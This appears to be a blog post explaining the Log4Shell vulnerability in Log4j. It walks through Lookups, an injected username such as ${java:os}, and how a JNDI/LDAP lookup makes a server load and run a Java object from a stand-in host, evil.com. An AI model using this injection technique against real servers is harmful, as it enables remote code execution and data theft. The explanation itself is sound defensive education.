Log4Shell — Simple Techincal Explanation of the Exploit

6 min readDec 17, 2021

Last week’s Log4Shell vulnerability is a dramatic example of how modern applications, interconnected services and pervasive APIs can create substantial security challenges. As a security researcher who has spent years looking at API vulnerabilities, this is an excellent example of how things can go wrong. I recently was in a webinar explaining the details of this particular exploit to share my understanding of this emerging threat.

Background

Logs are a mechanism for developers to record events that occur in their applications. Effectively, they are a simple way for developers to save messages into one file so they can review the messages, troubleshoot and debug problems. Generally, there are two types of log messages. The first is hard-coded. For example, imagine that the CPU of your app suddenly increased by 10%. The log message for this event is fixed and said, “The CPU increased 10%.” This is hard-coded and there is no input from the user.

The second type of log message contains some form of user input. For example, a user logs into Facebook; the Facebook API logs the activity and writes into the log a message, “User <Hugo> logged in at 7:00 PM”. (Side note: In case you’re curious, Hugo is my stage name. So, if you see Hugo in your logs, there’s a good chance I was trying to exploit your system.☺)
The critical thing is that the username was sent to the log. This is important from a security perspective and this is also what is being exploited in the Log4j vulnerability: User input is getting into the log, which opens the door for attackers to exploit Log4Shell.

Why Logs are Vulnerable

There are many ways to implement a logging mechanism. You can just put all the messages into one file and then read it manually. It’s a simple option, but it doesn’t really scale with complex systems. Developers usually adopt logging frameworks because it makes their job easier. In every language, you can find different frameworks to manage your log.

One of the most common and rich logging frameworks is Log4j in Java, part of the Apache Framework. Log4j makes developers more efficient when they write logs. Logging frameworks often offer complex parsing of log records, which is where a log entry that includes user input might become a problem. What if user input gets processed by the logging framework as a command? That could be bad. And that’s exactly what we see in the Log4Shell exploit.

Log4Shell

The vulnerability was reported by a researcher from the Alibaba Cloud team on November 24, 2021, and publicly disclosed by Apache on December 9, 2021. It’s a massive issue because the vulnerability impacts hundreds of millions (potentially even billions) of devices. At this point, the blast radius of the exposure is not 100% clear.

This vulnerability is not very obvious. Three different components play different roles in the exploitation of the vulnerability and the ways an attacker could just use one HTTP call to run remote code on a server that runs Log4j. Stay with me — let’s explore the different components that led to this very critical vulnerability.

Log4j Lookups

Log4j offers developers many features to make their lives easier and save time. One of these features is called Lookups. It’s a fancy feature that allows developers to insert variables into their logs. Some parts of the log are constant while some are dynamic. For example, if a developer wants to write the current time into a log message, its dynamic value depends on when the code is running. Developers use Lookups to put variables, such as current time, into their logs. You can think about Lookups as a template language for Log4j.

In this code, you can see the developer wrote an error message into the log — “A problem occurred” and the ID of the current Docker container where Log4j runs. As part of the parsing of the log message, Log4j would convert this input: ${docker:containerID} into the container GUID, which is written to the log. In this scenario, Lookups are very cool and save developers time when they are coding as well as deliver consistent log entries.

Lookups by themselves are not a problem. The problem is when a user has the opportunity to inject a Lookup into the log. Here’s how an end-user could use Lookups to write a strange entry into the log. The user tries to log into the website using a weird username ${java:os}, which is actually a Lookup on Log4j.

Because the username doesn’t exist, the API logs this activity as “Login failed at 8:00 pm” and the username. During the parsing process, the Log4j library treats this input as a Lookup and converts it to the actual value of the variable — “Windows Server 2008”. The library runs a Java function — “java:os” — and then takes the returned string and stores it in the log.

This username to server name parse isn’t malicious, but it’s tricky. An attacker could access Java functions, which shouldn’t be exposed by design.

JNDI and Lookups

The Lookups mechanism supports various functions and protocols. One of the most interesting (and dangerous) is Java naming and directory interface (JNDI). This protocol allows the Log4j framework to load a Java object.

Rather than sending in a username, an attacker could just send a file name. The Log4j library would then try to use JNDI to find this file in your local environment and run it. Not good. As a user, you’re not supposed to be able to run Java files on the server. At the same time, it’s not seriously bad because it’s only a local file on the server.

Local Vs. LDAP

Here’s where it gets scary. JNDI supports different protocols to retrieve the Java file.

One of them is LDAP, which is where this scenario goes from bad to really, really bad. LDAP allows you to retrieve files from a remote location. The Log4j library will load the Java file from a remote LDAP server when using LDAP with JNDI.

The combination of user input, JNDI lookups and LDAP creates a love triangle.

This love triangle has spawned a hideous child: The Log4Shell payload we have all seen in the last week.

Log4Shell Payload — Attack Flow

Attackers usually use the payload we see in the picture above. The dollar sign and brackets “${xxxxx}” trigger a lookup. Inside this lookup, the attacker calls the JNDI-with-LDAP combination to load a remote Java file from Evil.com.

The evil.com server stores a file called “malicious_Java.” If the victim’s server is vulnerable, it would download and run the remote Java object from Evil.com.

This allows the attacker to execute any Java code on the victim server.

TLDR: It’s game over.

Now the attacker has full access to your system and can do whatever they want, from simply shutting down the system to having a remote shell, extracting all information on your server, and/or starting to mine cryptocurrency.